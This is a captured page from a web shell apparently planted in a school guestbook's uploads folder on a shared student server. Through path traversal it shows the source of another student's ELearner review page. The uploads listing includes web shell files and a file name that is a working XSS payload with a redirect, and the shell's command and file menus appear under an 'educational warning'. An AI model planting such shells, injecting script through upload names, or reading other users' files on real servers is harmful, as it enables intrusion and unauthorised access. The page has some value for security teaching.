📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../587164.klas4s23.mid-ica.nl/public_html/ELearner/review.php

<?php session_start(); include "db.php"; // Check if user is logged in if (!isset($_SESSION['user_id'])) { header("Location: login.php"); exit(); } $error_message = ""; $success_message = ""; // Check if user already has a review $stmt = $conn->prepare("SELECT id, rating, comment FROM reviews WHERE user_id = ?"); $stmt->execute([$_SESSION['user_id']]); $existing_review = $stmt->fetch(); // Handle review deletion if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['delete_review'])) { try { $stmt = $conn->prepare("DELETE FROM reviews WHERE user_id = ?"); $stmt->execute([$_SESSION['user_id']]); $success_message = "Your review has been deleted. You can now submit a new review."; $existing_review = null; // Reset existing review } catch (PDOException $e) { $error_message = "Error deleting review: " . $e->getMessage(); } } // Handle form submission if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['submit_review'])) { // Don't allow submission if user already has a review if ($existing_review) { $error_message = "You already have an active review. Please delete it first if you want to submit a new one."; } else { $rating = (int)$_POST['rating']; $comment = trim($_POST['comment']); // Validate input if ($rating < 1 || $rating > 5) { $error_message = "Please select a valid rating (1-5 stars)."; } elseif (empty($comment)) { $error_message = "Please enter a comment."; } elseif (strlen($comment) > 200) { $error_message = "Comment is too long. Maximum 200 characters."; } else { try { // Insert new review $stmt = $conn->prepare("INSERT INTO reviews (user_id, rating, comment) VALUES (?, ?, ?)"); $stmt->execute([$_SESSION['user_id'], $rating, $comment]); $success_message = "Your review has been submitted!"; // Redirect after a short delay header("refresh:2;url=homepage.php"); } catch (PDOException $e) { $error_message = "Error saving review: " . $e->getMessage(); } } } } // Get username $stmt = $conn->prepare("SELECT username FROM users WHERE id = ?"); $stmt->execute([$_SESSION['user_id']]); $user = $stmt->fetch(); $username = $user ? $user['username'] : 'User'; ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Leave a Review - ELearner</title> <link href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2.19/dist/tailwind.min.css" rel="stylesheet"> <link rel="stylesheet" href="styles.css"> <link rel="stylesheet" href="font-styles.css"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css"> <style> .star-rating { display: flex; flex-direction: row-reverse; justify-content: flex-end; } .star-rating input { display: none; } .star-rating label { color: #ddd; font-size: 2rem; padding: 0 0.1rem; cursor: pointer; } .star-rating input:checked ~ label { color: #ffca08; } .star-rating label:hover, .star-rating label:hover ~ label { color: #ffca08; } .character-counter { text-align: right; font-size: 0.8rem; color: #666; } </style> </head> <body class="bg-gray-100 min-h-screen"> <div class="container mx-auto px-4 py-4 sm:py-8"> <header class="bg-white rounded-lg shadow-md p-4 sm:p-6 mb-6 sm:mb-8"> <div class="flex flex-wrap items-center justify-between"> <div class="flex items-center"> <a href="homepage.php"> <img src="images/icon-e-learner-blue.png" alt="ELearner Logo" class="h-10 sm:h-12 mr-3 sm:mr-4"> </a> <div> <h1 class="text-2xl sm:text-3xl font-bold text-blue-600">ELearner</h1> <p class="text-sm sm:text-base text-gray-600">Leave a Review</p> </div> </div>  <button id="mobileMenuBtn" class="md:hidden p-2 rounded text-blue-600 hover:bg-blue-100"> <svg class="w-6 h-6" fill="none" stroke="currentColor" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"> <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M4 6h16M4 12h16M4 18h16"></path> </svg> </button> <nav id="desktopMenu" class="hidden md:block"> <ul class="flex space-x-4 sm:space-x-6"> <li><a href="homepage.php" class="text-blue-500 font-medium hover:underline">Home</a></li> <li><a href="index.php" class="text-blue-500 font-medium hover:underline">Vocabulary Tool</a></li> <li><a href="my_lists.php" class="text-blue-500 font-medium hover:underline">My Lists</a></li> <li><a href="list_hub.php" class="text-blue-500 font-medium hover:underline">List Hub</a></li> <li><a href="profile.php" class="text-blue-500 font-medium hover:underline">My Profile</a></li> <?php if(isset($_SESSION['is_admin']) && $_SESSION['is_admin'] == 1): ?> <li><a href="admin.php" class="text-purple-500 font-medium hover:underline">Admin</a></li> <?php endif; ?> <li><a href="logout.php" class="text-red-500 font-medium hover:underline">Logout</a></li> <li> <button id="fontToggleBtn" class="bg-purple-500 text-white px-3 py-1 rounded hover:bg-purple-600"> Toggle Font </button> </li> </ul> </nav> </div>  <nav id="mobileMenu" class="md:hidden hidden mt-4 pb-2"> <ul class="flex flex-col space-y-3"> <li><a href="homepage.php" class="block text-blue-500 font-medium hover:underline">Home</a></li> <li><a href="index.php" class="block text-blue-500 font-medium hover:underline">Vocabulary Tool</a></li> <li><a href="my_lists.php" class="block text-blue-500 font-medium hover:underline">My Lists</a></li> <li><a href="list_hub.php" class="block text-blue-500 font-medium hover:underline">List Hub</a></li> <li><a href="profile.php" class="block text-blue-500 font-medium hover:underline">My Profile</a></li> <?php if(isset($_SESSION['is_admin']) && $_SESSION['is_admin'] == 1): ?> <li><a href="admin.php" class="block text-purple-500 font-medium hover:underline">Admin</a></li> <?php endif; ?> <li><a href="logout.php" class="block text-red-500 font-medium hover:underline">Logout</a></li> <li> <button id="mobileFontToggleBtn" class="bg-purple-500 text-white px-3 py-1 rounded hover:bg-purple-600"> Toggle Font </button> </li> </ul> </nav> </header> <main class="bg-white rounded-lg shadow-md p-4 sm:p-6 max-w-md mx-auto"> <h2 class="text-xl sm:text-2xl font-bold mb-6 text-center">Share Your Experience</h2> <?php if ($error_message): ?> <div class="bg-red-100 border border-red-400 text-red-700 px-4 py-3 rounded mb-4" role="alert"> <p><?php echo $error_message; ?></p> </div> <?php endif; ?> <?php if ($success_message): ?> <div class="bg-green-100 border border-green-400 text-green-700 px-4 py-3 rounded mb-4" role="alert"> <p><?php echo $success_message; ?></p> </div> <?php endif; ?> <?php if ($existing_review): ?> <div class="mb-6"> <div class="bg-blue-50 p-4 rounded-md"> <h3 class="font-medium mb-2">Your Current Review</h3> <div class="text-yellow-500 mb-2"> <?php for ($i = 0; $i < 5; $i++): ?> <?php if ($i < $existing_review['rating']): ?> <i class="fas fa-star"></i> <?php else: ?> <i class="far fa-star"></i> <?php endif; ?> <?php endfor; ?> </div> <p class="mb-4"><?php echo htmlspecialchars($existing_review['comment']); ?></p> <form method="post" onsubmit="return confirm('Are you sure you want to delete your review? This cannot be undone.')"> <div class="flex justify-between"> <button type="submit" name="delete_review" class="bg-red-500 text-white py-2 px-4 rounded hover:bg-red-600 transition"> Delete Review </button> <a href="homepage.php" class="text-gray-500 hover:underline">Back to Home</a> </div> </form> </div> <p class="text-sm text-gray-500 mt-3"> You can only have one review at a time. To submit a new review, please delete your current review first. </p> </div> <?php else: ?> <form method="post" class="space-y-6"> <div> <label class="block text-gray-700 mb-2">Your Rating</label> <div class="star-rating"> <input type="radio" id="star5" name="rating" value="5"> <label for="star5" title="5 stars"><i class="fas fa-star"></i></label> <input type="radio" id="star4" name="rating" value="4"> <label for="star4" title="4 stars"><i class="fas fa-star"></i></label> <input type="radio" id="star3" name="rating" value="3"> <label for="star3" title="3 stars"><i class="fas fa-star"></i></label> <input type="radio" id="star2" name="rating" value="2"> <label for="star2" title="2 stars"><i class="fas fa-star"></i></label> <input type="radio" id="star1" name="rating" value="1"> <label for="star1" title="1 star"><i class="fas fa-star"></i></label> </div> </div> <div> <label for="comment" class="block text-gray-700 mb-2">Your Comment (max 200 characters)</label> <textarea id="comment" name="comment" rows="4" maxlength="200" class="w-full p-2 border border-gray-300 rounded focus:outline-none focus:ring-2 focus:ring-blue-500" required></textarea> <div class="character-counter"> <span id="char-count">0</span>/200 characters </div> </div> <div class="flex items-center justify-between"> <button type="submit" name="submit_review" class="bg-blue-500 text-white py-2 px-4 rounded hover:bg-blue-600 transition"> Submit Review </button> <a href="homepage.php" class="text-gray-500 hover:underline">Cancel</a> </div> </form> <?php endif; ?> </main> </div> <script> // Mobile menu toggle document.getElementById("mobileMenuBtn").addEventListener("click", function() { const mobileMenu = document.getElementById("mobileMenu"); mobileMenu.classList.toggle("hidden"); }); // Copy font toggle functionality to mobile button if (document.getElementById("mobileFontToggleBtn")) { document.getElementById("mobileFontToggleBtn").addEventListener("click", function() { document.getElementById("fontToggleBtn").click(); }); } // Character counter const commentField = document.getElementById('comment'); const charCount = document.getElementById('char-count'); function updateCharCount() { const count = commentField.value.length; charCount.textContent = count; if (count > 180) { charCount.classList.add('text-orange-500'); } else { charCount.classList.remove('text-orange-500'); } } // Initialize character count updateCharCount(); // Update on input commentField.addEventListener('input', updateCharCount); </script> <script src="font-toggle.js"></script> </body> </html>

🎯 Available Actions

⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!

🐚 WEB SHELL ACTIVATED

📁 File Browser

📄 Viewing: ./../../../../587164.klas4s23.mid-ica.nl/public_html/ELearner/review.php

🎯 Available Actions

Command Execution:

Quick Commands:

File Operations: